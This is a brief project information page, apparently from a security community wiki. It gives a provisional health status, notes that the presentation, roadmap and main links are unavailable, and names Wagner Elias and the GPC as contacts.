3x slide Project Presentation: N/A

Mailing list: Subscribe or read the archives

Project Roadmap: N/A

Main links: N/A

Project Health: Not Reviewed (Provisional)
To be reviewed under Assessment Criteria v2.0

Key Contacts
  • Contact Wagner Elias to contribute, review or sponsor this project
  • Contact the GPC to report a problem or concern about this project or to update information.
